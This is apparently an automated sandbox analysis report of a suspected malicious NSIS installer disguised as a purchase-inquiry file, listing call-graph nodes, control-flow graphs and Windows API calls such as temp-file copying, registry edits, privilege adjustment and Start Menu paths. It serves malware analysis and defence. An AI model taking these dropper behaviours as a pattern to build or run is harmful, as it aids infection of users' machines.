5608 402bbf 18 API calls 5607->5608 5608->5606 5609 401423 25 API calls 5610 4021e1 5609->5610 5611->5609 5611->5610 5612 401b16 5613 402bbf 18 API calls 5612->5613 5614 401b1d 5613->5614 5615 402ba2 18 API calls 5614->5615 5616 401b26 wsprintfW 5615->5616 5617 402a4c 5616->5617 5625 10001058 5627 10001074 5625->5627 5626 100010dd 5627->5626 5628 10001092 5627->5628 5629 10001516 GlobalFree 5627->5629 5630 10001516 GlobalFree 5628->5630 5629->5628 5631 100010a2 5630->5631 5632 100010b2 5631->5632 5633 100010a9 GlobalSize 5631->5633 5634 100010b6 GlobalAlloc 5632->5634 5635 100010c7 5632->5635 5633->5632 5636 1000153d 3 API calls 5634->5636 5637 100010d2 GlobalFree 5635->5637 5636->5635 5637->5626 5645 40159b 5646 402bbf 18 API calls 5645->5646 5647 4015a2 SetFileAttributesW 5646->5647 5648 4015b4 5647->5648 5014 40229d 5015 4022a5 5014->5015 5017 4022ab 5014->5017 5016 402bbf 18 API calls 5015->5016 5016->5017 5018 4022b9 5017->5018 5019 402bbf 18 API calls 5017->5019 5020 4022c7 5018->5020 5022 402bbf 18 API calls 5018->5022 5019->5018 5021 402bbf 18 API calls 5020->5021 5023 4022d0 WritePrivateProfileStringW 5021->5023 5022->5020 5649 401f1d 5650 402bbf 18 API calls 5649->5650 5651 401f24 5650->5651 5652 4063f4 5 API calls 5651->5652 5653 401f33 5652->5653 5654 401fb7 5653->5654 5655 401f4f GlobalAlloc 5653->5655 5655->5654 5656 401f63 5655->5656 5657 4063f4 5 API calls 5656->5657 5658 401f6a 5657->5658 5659 4063f4 5 API calls 5658->5659 5660 401f74 5659->5660 5660->5654 5664 405f61 wsprintfW 5660->5664 5662 401fa9 5665 405f61 wsprintfW 5662->5665 5664->5662 5665->5654 5666 40149e 5667 402288 5666->5667 5668 4014ac PostQuitMessage 5666->5668 5668->5667 5669 40249e 5670 402cc9 19 API calls 5669->5670 5671 4024a8 5670->5671 5672 402ba2 18 API calls 5671->5672 5673 4024b1 5672->5673 5674 4024d5 RegEnumValueW 5673->5674 5675 4024c9 RegEnumKeyW 5673->5675 5677 40281e 5673->5677 5676 4024ee RegCloseKey 5674->5676 5674->5677 5675->5676 5676->5677 5024 40231f 5025 402324 5024->5025 5026 40234f 5024->5026 5027 402cc9 19 API calls 5025->5027 5028 402bbf 18 API calls 5026->5028 5030 40232b 5027->5030 5029 402356 5028->5029 5036 402bff RegOpenKeyExW 5029->5036 5031 402335 5030->5031 5035 40236c 5030->5035 5032 402bbf 18 API calls 5031->5032 5034 40233c RegDeleteValueW RegCloseKey 5032->5034 5034->5035 5037 402c93 5036->5037 5044 402c2a 5036->5044 5037->5035 5038 402c50 RegEnumKeyW 5039 402c62 RegCloseKey 5038->5039 5038->5044 5041 4063f4 5 API calls 5039->5041 5040 402c87 RegCloseKey 5046 402c76 5040->5046 5043 402c72 5041->5043 5042 402bff 5 API calls 5042->5044 5045 402ca2 RegDeleteKeyW 5043->5045 5043->5046 5044->5038 5044->5039 5044->5040 5044->5042 5045->5046 5046->5037 5686 403821 5687 40382c 5686->5687 5688 403833 GlobalAlloc 5687->5688 5689 403830 5687->5689 5688->5689 5690 100010e1 5694 10001111 5690->5694 5691 100011d8 GlobalFree 5692 100012ba 2 API calls 5692->5694 5693 100011d3 5693->5691 5694->5691 5694->5692 5694->5693 5695 10001164 GlobalAlloc 5694->5695 5696 100011f8 GlobalFree 5694->5696 5697 10001272 2 API calls 5694->5697 5698 100012e1 lstrcpyW 5694->5698 5699 100011c4 GlobalFree 5694->5699 5695->5694 5696->5694 5697->5699 5698->5694 5699->5694 5700 401ca3 5701 402ba2 18 API calls 5700->5701 5702 401ca9 IsWindow 5701->5702 5703 401a05 5702->5703 5704 402a27 5705 402a3c 5704->5705 5706 402a41 InvalidateRect 5705->5706 5707 402a4c 5705->5707 5706->5707 4848 40242a 4859 402cc9 4848->4859 4850 402434 4851 402bbf 18 API calls 4850->4851 4852 40243d 4851->4852 4853 402448 RegQueryValueExW 4852->4853 4856 40281e 4852->4856 4854 402468 4853->4854 4855 40246e RegCloseKey 4853->4855 4854->4855 4863 405f61 wsprintfW 4854->4863 4855->4856 4860 402bbf 18 API calls 4859->4860 4861 402ce2 4860->4861 4862 402cf0 RegOpenKeyExW 4861->4862 4862->4850 4863->4855 5708 40422c lstrlenW 5709 40424b 5708->5709 5710 40424d WideCharToMultiByte 5708->5710 5709->5710 5711 40172d 5712 402bbf 18 API calls 5711->5712 5713 401734 SearchPathW 5712->5713 5714 40174f 5713->5714 5722 404532 5723 404542 5722->5723 5724 404568 5722->5724 5725 4040de 19 API calls 5723->5725 5726 404145 8 API calls 5724->5726 5727 40454f SetDlgItemTextW 5725->5727 5728 404574 5726->5728 5727->5724 5729 4027b4 5730 4027ba 5729->5730 5731 4027c2 FindClose 5730->5731 5732 402a4c 5730->5732 5731->5732 4893 401b37 4894 401b44 4893->4894 4895 401b88 4893->4895 4896 401bcd 4894->4896 4902 401b5b 4894->4902 4897 401bb2 GlobalAlloc 4895->4897 4898 401b8d 4895->4898 4900 40603c 18 API calls 4896->4900 4907 402288 4896->4907 4899 40603c 18 API calls 4897->4899 4898->4907 4914 40601a lstrcpynW 4898->4914 4899->4896 4903 402282 4900->4903 4912 40601a lstrcpynW 4902->4912 4906 40575f MessageBoxIndirectW 4903->4906 4904 401b9f GlobalFree 4904->4907 4906->4907 4908 401b6a 4913 40601a lstrcpynW 4908->4913 4910 401b79 4915 40601a lstrcpynW 4910->4915 4912->4908 4913->4910 4914->4904 4915->4907 5733 402537 5734 402562 5733->5734 5735 40254b 5733->5735 5737 402596 5734->5737 5738 402567 5734->5738 5736 402ba2 18 API calls 5735->5736 5745 402552 5736->5745 5740 402bbf 18 API calls 5737->5740 5739 402bbf 18 API calls 5738->5739 5741 40256e WideCharToMultiByte lstrlenA 5739->5741 5742 40259d lstrlenW 5740->5742 5741->5745 5742->5745 5743 4025e0 5744 4025ca 5744->5743 5746 405ca1 WriteFile 5744->5746 5745->5743 5745->5744 5747 405cd0 5 API calls 5745->5747 5746->5743 5747->5744 4921 4052b8 4922 405462 4921->4922 4923 4052d9 GetDlgItem GetDlgItem GetDlgItem 4921->4923 4925 405493 4922->4925 4926 40546b GetDlgItem CreateThread FindCloseChangeNotification 4922->4926 4924 405349 4923->4924 4932 405350 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4924->4932 4927 4054be 4925->4927 4928 4054d2 4925->4928 4929 4054aa ShowWindow ShowWindow 4925->4929 4926->4925 4962 40524c 3 API calls 4926->4962 4927->4928 4930 40551e 4927->4930 4934 4054f8 ShowWindow 4927->4934 4931 404145 8 API calls 4928->4931 4960 404113 4929->4960 4930->4928 4940 40552c 4930->4940 4935 4054f1 4931->4935 4938 4053a2 SendMessageW SendMessageW 4932->4938 4939 4053be 4932->4939 4936 405518 4934->4936 4937 40550a 4934->4937 4936->4930 4941 405179 25 API calls 4937->4941 4938->4939 4942 4053d1 4939->4942 4943 4053c3 SendMessageW 4939->4943 4940->4935 4945 405545 CreatePopupMenu 4940->4945 4941->4936 4944 4040de 19 API calls 4942->4944 4943->4942 4946 4053e1 4944->4946 4947 40603c 18 API calls 4945->4947 4948 4053ea ShowWindow 4946->4948 4949 40541e GetDlgItem SendMessageW 4946->4949 4953 405555 AppendMenuW 4947->4953 4950 405400 ShowWindow 4948->4950 4951 40540d 4948->4951 4949->4935 4952 405445 SendMessageW SendMessageW 4949->4952 4950->4951 4951->4949 4952->4935 4954 405572 GetWindowRect 4953->4954 4955 405585 TrackPopupMenu 4953->4955 4954->4955 4955->4935 4956 4055a0 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4955->4956 4958 4055fe GlobalUnlock SetClipboardData CloseClipboard 4956->4958 4958->4935 4961 404127 4960->4961 4961->4927 5748 4014b8 5749 4014be 5748->5749 5750 401389 MulDiv 5749->5750 5751 4014c6 5750->5751 4969 4015b9 4970 402bbf 18 API calls 4969->4970 4971 4015c0 4970->4971 4972 405a79 4 API calls 4971->4972 4982 4015c9 4972->4982 4973 401629 4975 40165b 4973->4975 4976 40162e 4973->4976 4974 4059fb CharNextW 4974->4982 4979 401423 25 API calls 4975->4979 4977 401423 25 API calls 4976->4977 4978 401635 4977->4978 4988 40601a lstrcpynW 4978->4988 4985 401653 4979->4985 4980 4056c5 2 API calls 4980->4982 4982->4973 4982->4974 4982->4980 4983 4056e2 5 API calls 4982->4983 4986 40160f GetFileAttributesW 4982->4986 4987 405648 4 API calls 4982->4987 4983->4982 4984 401642 SetCurrentDirectoryW 4984->4985 4986->4982 4987->4982 4988->4984 5752 40293b 5753 402ba2 18 API calls 5752->5753 5754 402941 5753->5754 5755 402964 5754->5755 5756 40297d 5754->5756 5761 40281e 5754->5761 5757 402969 5755->5757 5758 40297a 5755->5758 5759 402993 5756->5759 5760 402987 5756->5760 5766 40601a lstrcpynW 5757->5766 5767 405f61 wsprintfW 5758->5767 5763 40603c 18 API calls 5759->5763 5762 402ba2 18 API calls 5760->5762 5762->5761 5763->5761 5766->5761 5767->5761 5768 10002a7f 5769 10002a97 5768->5769 5770 1000158f 2 API calls 5769->5770 5771 10002ab2 5770->5771

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 0 40326a-40329d SetErrorMode GetVersion 1 4032b0 0->1 2 40329f-4032a7 call 4063f4 0->2 4 4032b5-4032c9 call 406384 lstrlenA 1->4 2->1 7 4032a9 2->7 9 4032cb-40333f call 4063f4 * 2 #17 OleInitialize SHGetFileInfoW call 40601a GetCommandLineW call 40601a GetModuleHandleW 4->9 7->1 18 403341-403348 9->18 19 403349-403363 call 4059fb CharNextW 9->19 18->19 22 403369-40336f 19->22 23 40347a-403494 GetTempPathW call 403239 19->23 25 403371-403376 22->25 26 403378-40337c 22->26 30 403496-4034b4 GetWindowsDirectoryW lstrcatW call 403239 23->30 31 4034ec-403506 DeleteFileW call 402dee 23->31 25->25 25->26 28 403383-403387 26->28 29 40337e-403382 26->29 32 403446-403453 call 4059fb 28->32 33 40338d-403393 28->33 29->28 30->31 48 4034b6-4034e6 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403239 30->48 51 4035b7-4035c7 call 403789 OleUninitialize 31->51 52 40350c-403512 31->52 49 403455-403456 32->49 50 403457-40345d 32->50 37 403395-40339d 33->37 38 4033ae-4033e7 33->38 44 4033a4 37->44 45 40339f-4033a2 37->45 39 403404-40343e 38->39 40 4033e9-4033ee 38->40 39->32 47 403440-403444 39->47 40->39 46 4033f0-4033f8 40->46 44->38 45->38 45->44 54 4033fa-4033fd 46->54 55 4033ff 46->55 47->32 56 403465-403473 call 40601a 47->56 48->31 48->51 49->50 50->22 58 403463 50->58 69 4036ed-4036f3 51->69 70 4035cd-4035dd call 40575f ExitProcess 51->70 59 4035a7-4035ae call 403863 52->59 60 403518-403523 call 4059fb 52->60 54->39 54->55 55->39 64 403478 56->64 58->64 68 4035b3 59->68 71 403571-40357b 60->71 72 403525-40355a 60->72 64->23 68->51 74 403771-403779 69->74 75 4036f5-40370b GetCurrentProcess OpenProcessToken 69->75 79 4035e3-4035f7 call 4056e2 lstrcatW 71->79 80 40357d-40358b call 405ad6 71->80 76 40355c-403560 72->76 77 40377b 74->77 78 40377f-403783 ExitProcess 74->78 82 403741-40374f call 4063f4 75->82 83 40370d-40373b LookupPrivilegeValueW AdjustTokenPrivileges 75->83 84 403562-403567 76->84 85 403569-40356d 76->85 77->78 94 403604-40361e lstrcatW lstrcmpiW 79->94 95 4035f9-4035ff lstrcatW 79->95 80->51 93 40358d-4035a3 call 40601a * 2 80->93 96 403751-40375b 82->96 97 40375d-403768 ExitWindowsEx 82->97 83->82 84->85 89 40356f 84->89 85->76 85->89 89->71 93->59 94->51 100 403620-403623 94->100 95->94 96->97 98 40376a-40376c call 40140b 96->98 97->74 97->98 98->74 104 403625-40362a call 405648 100->104 105 40362c call 4056c5 100->105 110 403631-40363f SetCurrentDirectoryW 104->110 105->110 112 403641-403647 call 40601a 110->112 113 40364c-403675 call 40601a 110->113 112->113 117 40367a-403696 call 40603c DeleteFileW 113->117 120 4036d7-4036df 117->120 121 403698-4036a8 CopyFileW 117->121 120->117 122 4036e1-4036e8 call 405ebb 120->122 121->120 123 4036aa-4036ca call 405ebb call 40603c call 4056fa 121->123 122->51 123->120 132 4036cc-4036d3 CloseHandle 123->132 132->120
                                                                    APIs
                                                                    • SetErrorMode.KERNELBASE ref: 0040328D
                                                                    • GetVersion.KERNEL32 ref: 00403293
                                                                    • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004032BC
                                                                    • #17.COMCTL32(00000007,00000009), ref: 004032DF
                                                                    • OleInitialize.OLE32(00000000), ref: 004032E6
                                                                    • SHGetFileInfoW.SHELL32(004206A8,00000000,?,000002B4,00000000), ref: 00403302
                                                                    • GetCommandLineW.KERNEL32(00428200,NSIS Error), ref: 00403317
                                                                    • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe",00000000), ref: 0040332A
                                                                    • CharNextW.USER32(00000000,"C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe",00000020), ref: 00403351
                                                                      • Part of subcall function 004063F4: GetModuleHandleA.KERNEL32(?,00000020,?,004032D3,00000009), ref: 00406406
                                                                      • Part of subcall function 004063F4: GetProcAddress.KERNEL32(00000000,?), ref: 00406421
                                                                    • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 0040348B
                                                                    • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040349C
                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034A8
                                                                    • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034BC
                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004034C4
                                                                    • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004034D5
                                                                    • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004034DD
                                                                    • DeleteFileW.KERNELBASE(1033), ref: 004034F1
                                                                      • Part of subcall function 0040601A: lstrcpynW.KERNEL32(?,?,00000400,00403317,00428200,NSIS Error), ref: 00406027
                                                                    • OleUninitialize.OLE32(?), ref: 004035BC
                                                                    • ExitProcess.KERNEL32 ref: 004035DD
                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 004035F0
                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040926C), ref: 004035FF
                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 0040360A
                                                                    • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe",00000000,?), ref: 00403616
                                                                    • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403632
                                                                    • DeleteFileW.KERNEL32(0041FEA8,0041FEA8,?,0042A000,?), ref: 0040368C
                                                                    • CopyFileW.KERNEL32(C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe,0041FEA8,00000001), ref: 004036A0
                                                                    • CloseHandle.KERNEL32(00000000,0041FEA8,0041FEA8,?,0041FEA8,00000000), ref: 004036CD
                                                                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 004036FC
                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00403703
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403718
                                                                    • AdjustTokenPrivileges.ADVAPI32 ref: 0040373B
                                                                    • ExitWindowsEx.USER32(00000002,80040002), ref: 00403760
                                                                    • ExitProcess.KERNEL32 ref: 00403783
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                    • String ID: "C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\savoyed\antimodel$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\savoyed\antimodel\Intensifies$C:\Users\user\Desktop$C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                    • API String ID: 2488574733-2258380281
                                                                    • Opcode ID: 2b54f9999654f9d35fa504d03d0a222ab1f1c274e36a8211ae6028975d434c71
                                                                    • Instruction ID: 73295983c26b9bc795aacbdf710e3d5853a553e8a558082b103844ae68e0e3ab
                                                                    • Opcode Fuzzy Hash: 2b54f9999654f9d35fa504d03d0a222ab1f1c274e36a8211ae6028975d434c71
                                                                    • Instruction Fuzzy Hash: C3D1F470644200BBD720BF659D45A3B3AACEB8074AF10487EF541B62D2DB7D9D42CB6E

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 133 4052b8-4052d3 134 405462-405469 133->134 135 4052d9-4053a0 GetDlgItem * 3 call 404113 call 404a16 GetClientRect GetSystemMetrics SendMessageW * 2 133->135 137 405493-4054a0 134->137 138 40546b-40548d GetDlgItem CreateThread FindCloseChangeNotification 134->138 156 4053a2-4053bc SendMessageW * 2 135->156 157 4053be-4053c1 135->157 140 4054a2-4054a8 137->140 141 4054be-4054c8 137->141 138->137 143 4054e3-4054ec call 404145 140->143 144 4054aa-4054b9 ShowWindow * 2 call 404113 140->144 145 4054ca-4054d0 141->145 146 40551e-405522 141->146 153 4054f1-4054f5 143->153 144->141 151 4054d2-4054de call 4040b7 145->151 152 4054f8-405508 ShowWindow 145->152 146->143 149 405524-40552a 146->149 149->143 158 40552c-40553f 149->158 151->143 154 405518-405519 call 4040b7 152->154 155 40550a-405513 call 405179 152->155 154->146 155->154 156->157 162 4053d1-4053e8 call 4040de 157->162 163 4053c3-4053cf SendMessageW 157->163 166 405641-405643 158->166 167 405545-405570 CreatePopupMenu call 40603c AppendMenuW 158->167 170 4053ea-4053fe ShowWindow 162->170 171 40541e-40543f GetDlgItem SendMessageW 162->171 163->162 166->153 176 405572-405582 GetWindowRect 167->176 177 405585-40559a TrackPopupMenu 167->177 172 405400-40540b ShowWindow 170->172 173 40540d 170->173 171->166 174 405445-40545d SendMessageW * 2 171->174 178 405413-405419 call 404113 172->178 173->178 174->166 176->177 177->166 179 4055a0-4055b7 177->179 178->171 181 4055bc-4055d7 179->181 183 4055d9-4055fc OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 181->183 184 4055fe-405625 183->184 186 405627-40563b GlobalUnlock SetClipboardData CloseClipboard 184->186 186->166
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,00000403), ref: 00405316
                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00405325
                                                                    • GetClientRect.USER32(?,?), ref: 00405362
                                                                    • GetSystemMetrics.USER32(00000002), ref: 00405369
                                                                    • SendMessageW.USER32(?,00001061,00000000,?), ref: 0040538A
                                                                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040539B
                                                                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053AE
                                                                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053BC
                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 004053CF
                                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004053F1
                                                                    • ShowWindow.USER32(?,00000008), ref: 00405405
                                                                    • GetDlgItem.USER32(?,000003EC), ref: 00405426
                                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405436
                                                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040544F
                                                                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040545B
                                                                    • GetDlgItem.USER32(?,000003F8), ref: 00405334
                                                                      • Part of subcall function 00404113: SendMessageW.USER32(00000028,?,00000001,00403F3F), ref: 00404121
                                                                    • GetDlgItem.USER32(?,000003EC), ref: 00405478
                                                                    • CreateThread.KERNELBASE(00000000,00000000,Function_0000524C,00000000), ref: 00405486
                                                                    • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040548D
                                                                    • ShowWindow.USER32(00000000), ref: 004054B1
                                                                    • ShowWindow.USER32(?,00000008), ref: 004054B6
                                                                    • ShowWindow.USER32(00000008), ref: 00405500
                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405534
                                                                    • CreatePopupMenu.USER32 ref: 00405545
                                                                    • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405559
                                                                    • GetWindowRect.USER32(?,?), ref: 00405579
                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405592
                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 004055CA
                                                                    • OpenClipboard.USER32(00000000), ref: 004055DA
                                                                    • EmptyClipboard.USER32 ref: 004055E0
                                                                    • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004055EC
                                                                    • GlobalLock.KERNEL32(00000000), ref: 004055F6
                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040560A
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0040562A
                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00405635
                                                                    • CloseClipboard.USER32 ref: 0040563B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                                                    • String ID: `7~v0}${$&B
                                                                    • API String ID: 4154960007-3824033341
                                                                    • Opcode ID: 2a917bbd3b44fd9cb5b6d0897a12355830e6d7475328c9c4ea58580c84b5c048
                                                                    • Instruction ID: b072520f5ee80a331e4e918265d0c1a5052efaeab479527f9264255038cc5675
                                                                    • Opcode Fuzzy Hash: 2a917bbd3b44fd9cb5b6d0897a12355830e6d7475328c9c4ea58580c84b5c048
                                                                    • Instruction Fuzzy Hash: BDB13B71900208FFDB219F60DD89AAE7B79FB44355F10803AFA01B61A0C7755E92DF69

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 495 40580b-405831 call 405ad6 498 405833-405845 DeleteFileW 495->498 499 40584a-405851 495->499 502 4059c7-4059cb 498->502 500 405853-405855 499->500 501 405864-405874 call 40601a 499->501 503 405975-40597a 500->503 504 40585b-40585e 500->504 508 405883-405884 call 405a1a 501->508 509 405876-405881 lstrcatW 501->509 503->502 507 40597c-40597f 503->507 504->501 504->503 510 405981-405987 507->510 511 405989-405991 call 40635d 507->511 512 405889-40588d 508->512 509->512 510->502 511->502 519 405993-4059a7 call 4059ce call 4057c3 511->519 515 405899-40589f lstrcatW 512->515 516 40588f-405897 512->516 518 4058a4-4058c0 lstrlenW FindFirstFileW 515->518 516->515 516->518 520 4058c6-4058ce 518->520 521 40596a-40596e 518->521 535 4059a9-4059ac 519->535 536 4059bf-4059c2 call 405179 519->536 524 4058d0-4058d8 520->524 525 4058ee-405902 call 40601a 520->525 521->503 523 405970 521->523 523->503 529 4058da-4058e2 524->529 530 40594d-40595d FindNextFileW 524->530 537 405904-40590c 525->537 538 405919-405924 call 4057c3 525->538 529->525 534 4058e4-4058ec 529->534 530->520 533 405963-405964 FindClose 530->533 533->521 534->525 534->530 535->510 539 4059ae-4059bd call 405179 call 405ebb 535->539 536->502 537->530 540 40590e-405917 call 40580b 537->540 548 405945-405948 call 405179 538->548 549 405926-405929 538->549 539->502 540->530 548->530 552 40592b-40593b call 405179 call 405ebb 549->552 553 40593d-405943 549->553 552->530 553->530
                                                                    APIs
                                                                    • DeleteFileW.KERNELBASE(?,?,75C43420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405834
                                                                    • lstrcatW.KERNEL32(004246F0,\*.*), ref: 0040587C
                                                                    • lstrcatW.KERNEL32(?,00409014), ref: 0040589F
                                                                    • lstrlenW.KERNEL32(?,?,00409014,?,004246F0,?,?,75C43420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058A5
                                                                    • FindFirstFileW.KERNEL32(004246F0,?,?,?,00409014,?,004246F0,?,?,75C43420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058B5
                                                                    • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405955
                                                                    • FindClose.KERNEL32(00000000), ref: 00405964
                                                                    Strings
                                                                    • "C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe", xrefs: 0040580B
                                                                    • \*.*, xrefs: 00405876
                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405818
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
